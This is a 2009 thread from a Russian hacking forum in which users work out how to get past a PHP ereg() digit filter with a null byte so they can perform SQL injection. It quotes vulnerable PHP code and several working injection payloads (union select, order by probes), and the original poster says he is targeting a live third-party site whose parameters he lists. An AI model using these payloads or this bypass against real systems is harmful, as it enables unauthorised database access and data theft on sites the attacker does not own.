ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
13.06.2009, 21:16
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534
Репутация:
2731
|
|
Grey, спасибо за объяснения, не ожидал такой помощи. Я тестил у себя на локале, но т.к. это локал, ссыль выложил на другой форум.
PS: Сорсы этого "фильтра" - http://forum.rockmanpm.com/Sources/Subs.php~
Последний раз редактировалось mailbrush; 13.06.2009 в 21:18..
|
|
|
13.06.2009, 20:49
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
PHP код:
if(ereg("^[0-9]+$",$ar["lid"] = $_GET['lid']))
{
$query = mysql_query("SELECT * FROM main WHERE lid = '$lid'");
Почему не работает вариант с NULL-байтом ? например, 5%00.Нулл байт же обходит проверку при ereg функциях. |
|
|
|
13.06.2009, 21:41
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Сообщение от Велемир
Почему не работает вариант с NULL-байтом ? например, 5%00.Нулл байт же обходит проверку при ereg функциях.
Как именно не работает ? Как ты проверяешь ? меджик_квотес отключены ?
lid=2%00'+union+select+1--+ - должно работать
Последний раз редактировалось ElteRUS; 13.06.2009 в 21:51..
|
|
|
|
13.06.2009, 21:48
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
Велемир, пример того как ты обходил покажи
|
|
|
|
13.06.2009, 21:54
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Ээ...пасип,но уже не имеет смысла.Там кавычки включены оказывается.
Решил чутка поменять на локалхосте:
PHP код:
$c = mysql_connect("localhost","root","vertrigo");
$user = $_GET['user'];
if(ereg("^[0-9]+$",$user)) {
echo "Ты хакер,обошедший фильтрацию!";
$q = mysql_query("Select * from mysql.user where User='$user'");
$r = mysql_fetch_array($q);
print_r($r);
}
else {
echo "Хакер!";
}
Результат только на кавычку катит,а запрос не провести.Пробовал ставить 1%00order+by+1 и т.д.
Вообще,нашёл эту хрень на сайте,висящем на двиге,похожий на вордпресс. Есть переменные: lid,o,c,start,actions.Может,кто скажет точнее ?
Последний раз редактировалось Велемир; 13.06.2009 в 22:07..
|
|
|
|
13.06.2009, 22:08
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
надо закрывать кавычку в запросе, как тебе ElteRUS написал
1%00'+union+select+1,2,n/*
|
|
|
|
13.06.2009, 22:14
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Бесполезно:
http://localhost/ttt.php?user=1%00'+union+select+version()/*
Выводит тупо ошибку.На ордер ему пофиг.Запрос не провести
|
|
|
|
13.06.2009, 22:24
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
Провел на форуме:
7215020
Репутация:
1423
|
|
Валемир, а ты попробуй так:
http://localhost/ttt.php?user=1%00'+order+by+1--+
Будет ошибка:
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result
А потом так:
http://localhost/ttt.php?user=1%00'+order+by+1000--+
Будет ошибка:
Warning: mysql_result(): supplied argument is not a valid MySQL result
Я прав или нет ?)
|
|
|
|
13.06.2009, 22:29
|
|
Members of Antichat - Level 5
Регистрация: 09.10.2006
Сообщений: 1,698
Провел на форуме:
9098076
Репутация:
4303
|
|
какая ошибка?
|
|
|
|
13.06.2009, 22:29
|
|
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161
Репутация:
142
|
|
Чёрт побери,да ты прав!Только я заменил мускул резалт на феч аррай.Почему твой вариант работает?!? Ни --,ни /*,ни %3c не работает,а твой работает.Почему ?
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид